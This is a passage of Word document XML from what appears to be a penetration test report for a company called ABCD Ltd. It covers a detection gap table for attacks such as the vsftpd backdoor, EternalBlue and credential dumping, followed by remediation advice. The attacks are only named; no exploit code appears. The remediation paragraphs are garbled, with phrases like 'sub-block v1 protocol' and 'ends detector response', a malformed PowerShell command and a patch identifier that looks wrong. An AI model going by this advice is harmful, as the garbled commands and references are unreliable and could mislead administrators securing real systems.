        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Fig. 1</w:t>
      </w:r>
      <w:r w:rsidR="00F016B3" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>whatami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> and help.</w:t>
      </w:r>
      <w:r w:rsidR="00E32FA2" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8AB9FD" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00EA4F2C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5. Detection Gap Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0E05EF"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t xml:space="preserve">A systematic absence of security alerting was observed across all three exploitation phases, indicative of foundational deficiencies in the organisation's defensive architecture. The complete failure of existing controls to detect or interrupt any phase of the attack chain demonstrates that ABCD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Ltd's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> current security posture is operationally inadequate against even moderately sophisticated threat actors employing publicly available tooling and documented exploitation techniques. [14]</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable1Light"/>
        <w:tblW w:w="9026" w:type="dxa"/>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1600"/>
        <w:gridCol w:w="2000"/>
        <w:gridCol w:w="1026"/>
        <w:gridCol w:w="4400"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="61921CEB" w14:textId="77777777" w:rsidTr="000D3F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C1B6887" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E320E7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2285FAC8" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E320E7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Expected Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1026" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08F2882D" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E320E7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B5EDEB1" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00E320E7" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E320E7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Root Cause of Detection Failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="37F587F7" w14:textId="77777777" w:rsidTr="000D3F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D6C3D6F" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:r w:rsidRPr="00C668B5">
              <w:t>Exploit A: vsftpd RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C7DB1E6" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:r w:rsidRPr="00C668B5">
              <w:t>IDS/IPS; FTP anomaly detection; network monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1026" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D1EB7F1" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:r w:rsidRPr="00C668B5">
              <w:t>ABSENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E838E44" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:r w:rsidRPr="00C668B5">
              <w:t>No IDS deployed; FTP service unmonitored; no anomaly baseline established</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="341BF074" w14:textId="77777777" w:rsidTr="000D3F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="616DF096" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:r w:rsidRPr="00C668B5">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C668B5">
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C668B5">
              <w:t>/shadow Exfil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51B38CDF" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:r w:rsidRPr="00C668B5">
              <w:t>File integrity monitoring; DLP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1026" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="703033CE" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:r w:rsidRPr="00C668B5">
              <w:t>ABSENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04405C27" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:r w:rsidRPr="00C668B5">
              <w:t>No FIM on critical credential files; no outbound data inspection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="35EA4DBE" w14:textId="77777777" w:rsidTr="000D3F76">
        <w:trPr>
          <w:trHeight w:val="698"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EE45308" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:r w:rsidRPr="00C668B5">
              <w:t xml:space="preserve">Exploit B: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C668B5">
              <w:t>EternalBlue</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="085218ED" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:r w:rsidRPr="00C668B5">
              <w:t>Patch management; SMBv1 disabled; EDR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1026" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5092E65B" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:r w:rsidRPr="00C668B5">
              <w:t>ABSENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E9C1BFC" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:r w:rsidRPr="00C668B5">
              <w:t>Server unpatched; SMBv1 enabled; no EDR; Event 4625 not forwarded to SIEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="11E41BED" w14:textId="77777777" w:rsidTr="000D3F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78B53887" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C668B5">
              <w:t>hashdump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C668B5">
              <w:t xml:space="preserve"> (SAM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B469052" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:r w:rsidRPr="00C668B5">
              <w:t>EDR credential dump detection; LSASS protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1026" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D1B8E9A" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:r w:rsidRPr="00C668B5">
              <w:t>ABSENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="653A8A9A" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:r w:rsidRPr="00C668B5">
              <w:t>No EDR; Windows Credential Guard not enabled; no SIEM alerting on T1003</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w14:paraId="6BB0EED2" w14:textId="77777777" w:rsidTr="000D3F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77100EBD" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:r w:rsidRPr="00C668B5">
              <w:t>Exploit C: Win10 Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E1258FA" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:r w:rsidRPr="00C668B5">
              <w:t>Account lockout policy; MFA on RDP; NLA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1026" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60EC5373" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:r w:rsidRPr="00C668B5">
              <w:t>ABSENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="654A3A71" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00E320E7">
            <w:r w:rsidRPr="00C668B5">
              <w:t>No account lockout configured; RDP exposed without NLA; no MFA enforced</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7DC6CC19" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E90C4CE" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DAF811" w14:textId="77777777" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00EA4F2C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6. Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EED4AD" w14:textId="1D2B44D0" w:rsidR="0096522D" w:rsidRPr="00C668B5" w:rsidRDefault="0096522D" w:rsidP="0096522D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>The strategy of the remediation actions follows the score list provided by the CVSS v3.1 scoring taxonomy and is aligned to the NCSC Cyber Essentials Plus control framework in order of importance. Urgent defensive measures symbolize the bare minimum of defensive capability to break the attack sequence as demonstrated [15].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3141A1CD" w14:textId="11F73667" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00EA4F2C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>6.1</w:t>
      </w:r>
      <w:r w:rsidR="00453791" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Critical — Immediate Action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C222F8A" w14:textId="77777777" w:rsidR="0072251C" w:rsidRPr="00C668B5" w:rsidRDefault="0072251C" w:rsidP="0072251C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Having disabled or isolated it, Pareto validates it using the image of a secure Linux server. It is not possible to patch the vsftpd 2.3.4 service because it is a backdoored binary [6]. Terminate all windows hosts sub-block v1 protocol with single command: Set-SmbServerConfiguration - EnableSMB1Protocol false. Install the KB401221212 patch in all the windows servers that are yet to get the patch [9]. Make sure that all the Remote Desktop Protocol endpoints were configured to require the Network Level Authentication (NLA). Set up policy of account lock failures (5 attempts) and account lockout policy (30 minutes) to discourage brute force.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B9067F" w14:textId="669924B5" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00EA4F2C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>6.2 High — Short Term</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DD6129" w14:textId="77777777" w:rsidR="00AB48FC" w:rsidRPr="00C668B5" w:rsidRDefault="00AB48FC" w:rsidP="0072251C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Install ends detector response (EDR) as Minimum Countermeasure in all servers and workstations. One endpoint recommended with this level is Microsoft Defender for Endpoint or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>CrowdStrikes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Falcon to allow the telemetry and real-time credential dump detection. [14].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D960F25" w14:textId="77777777" w:rsidR="0072251C" w:rsidRPr="00C668B5" w:rsidRDefault="0072251C" w:rsidP="0072251C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Implement a Security Information and Event Management (SIEM) platform where aggregation and determination of priorities of logs is concentrated. Event IDs 4662 (DCSync), 4648 (usage of explicit credentials), 4625 (logon failure), and aberrant SMB transaction volume thresholds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBD5794" w14:textId="6AD31E0D" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="0072251C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Establish a </w:t>
      </w:r>
      <w:r w:rsidR="001348C2" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>formalized</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability management </w:t>
      </w:r>
      <w:r w:rsidR="001348C2" w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>programmes</w:t>
      </w:r>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> with defined patching SLAs conformant with NCSC guidance: Critical 48 hours, High 14 days, Medium 30 days. [15]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A350C5" w14:textId="53FAEAA3" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00453791">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>6.3 Medium — Medium Term</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6A2F27" w14:textId="7BC6AE8F" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="0096522D" w:rsidP="00C668B5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Implement a network architecture of network segmentation and a demilitarized zone (DMZ) such that internet-facing services have no connections to internal corporate system infrastructure and pivoting through a compromised web or file server to domain infrastructure is prevented or, minimally, limited. [2] Set the security group membership of all privileged accounts to the Windows credential guard and protected users in order to prevent the NTLM hash extraction methods and make pass-the-hash and hash dump attacks impossible against privileged accounts. [11] Enforce NCSC advice on identity and access management by means of multi-factor authentication (MFA) of all administrative access points such as RDP, SSH, and local console access. [15]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2F2096" w14:textId="7D6FDB07" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="00E32FA2" w:rsidP="00EA4F2C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>7. Rules of Engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2701E6B2" w14:textId="3E34BE2F" w:rsidR="00E32FA2" w:rsidRPr="00C668B5" w:rsidRDefault="0096522D" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
